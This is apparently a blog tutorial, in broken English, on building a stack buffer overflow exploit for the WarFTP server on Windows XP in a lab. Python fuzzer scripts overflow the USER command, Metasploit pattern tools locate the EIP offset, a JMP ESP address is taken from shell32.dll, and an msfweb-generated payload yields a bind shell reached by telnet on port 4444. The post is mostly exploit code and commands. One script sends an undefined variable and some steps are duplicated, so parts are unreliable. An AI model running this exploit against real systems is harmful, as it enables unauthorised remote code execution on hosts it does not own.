Then I make a fuzzer using phyton language because for the application to be exploited is FTP. In here I'm using gedit, you can use other text editor.
Type command # gedit fuzzer.py and then type the commad bellow :
On line 4, variable buffer containing the characters "A" as much as 1000, because one character on ASCII worth one byte, so the data to be transmitted is 1000 bytes.
Now, run WarFTP on windows XP and set ONLINE
The next run file fuzzer.py using command # python fuzzer.py and see what happens to warFTP
warFTP disappear from the screen, why ? because the application crash, caused warFTP not created using SEH/safeSEH module.
Now warFTP through ollydbg
the next, running again the fuzzer from terminal and see what happen on warFTP ?
the application crash again, this is caused four register on warFTP application was struck down by data are sending from fuzzer, namely:
- ESP
- EDI
- EBP
- EIP
The four register above struck down by value 0x41.
Now I make a pattern_create, pattern_create is an tools on Metasploit are used to vulnerability development.
go to framework directory first : #cd /pentest/exploits/framework/tools/ and ls
then type the command : ./pattern_create.rb 1000 > string_pattern.txt
Content of string_pattern.txt
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
the next copy content string_pattern.txt to fuzzer.py like below :
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
#buffer = "\x41" * 1000
s.connect (('192.168.56.101',21))
data = s.recv (1024)
print("Sendingevildatavia USER command . . .")
s.send('USER '+buffer+'\r \n')
data = s.recv (1024)
s.send('PASS '+'\r \n')
s.close()
print("Finish")
After customize the fuzzer with pattern, then trying run the fuzzer. Open warFTP through ollydbg again and run the fuzzer then see what happen ?
See value on the ESP and EIP register, the second register constitute is a vital registers on a system.
The next step is search on byte to how the string overwrite existing registers using pattern_offset. like below :
From the result above shows that need 485byte data to achieve EIP register, and need 493 byte data to achieve the stack.
Then customize the fuzzer again to prove EIP register can be overwritten on byte 486, 487, 488, 489
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
nilaiEIP = "\x90" * 485
nilaiEIP+= "\xEF\xBE\xAD\xDE"
s.connect (('192.168.56.101',21))
data = s.recv (1024)
print("Sendingevildatavia USER command . . .")
s.send('USER '+nilaiEIP+'\r \n')
data = s.recv (1024)
s.send('PASS '+'\r \n')
s.close()
print("Finish")
On line 4, \xEF\xBE\xAD\xDE will be writing DEADBEEF because system using little-endian.
Run again warFTP through ollydbg and run fuzzer, see what happen ??
See on above, value of EIP register turn ino DEADBEEF
Next step trying to writing on ESP, ESP constitute is a temporary data storage area. If data succeed overwritten, so will be allows to put payload on stack. Now customize again the fuzzer like below :
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485
buffer+= "\xEF\xBE\xAD\xDE"
buffer+= "\x90" * (493-len(buffer))
buffer+= "\xCC" * (1000 - len(buffer))
s.connect (('192.168.56.101',21))
data = s.recv (1024)
print("Sendingevildatavia USER command . . .")
s.send('USER '+nilaiEIP+'\r \n')
data = s.recv (1024)
s.send('PASS '+'\r \n')
s.close()
print("Finish")
Open warFTP through ollydbg again and then run the fuzzer
The result above EIP register becomes DEADBEEF and the stack contain garbage data as many as 507byte.
Next step is search the JMP ESP, JMP ESP command is used by an application to read the data inside the buffer.
The first open tab view and select Executable modules, then select shell32.dll
Then right click on main window, select Search For and select command, and then type "JMP ESP"
The results :
In the above all of above running smoothly
It this time to create the payload, activate the frame work first.
/pentest/exploits/framework2# ./msfweb
The results :
Then customize again the fuzzer to change offset address to little-endian format
Run the warFTP through ollydbg and then run the fuzzer
In the above all of above running smoothly
It this time to create the payload, activate the frame work first.
/pentest/exploits/framework2# ./msfweb
And then open the address 127.0.0.1:55555 and please choose the payloads
required fill out the form like below :
Now, generate it
Copy the payload code and paste on the fuzzer
Afterthat, open the warFTP and run the fuzzer, obvious application will crash
then execution with type the command : telnet 192.168.56.101 4444
Finish,
No comments:
Post a Comment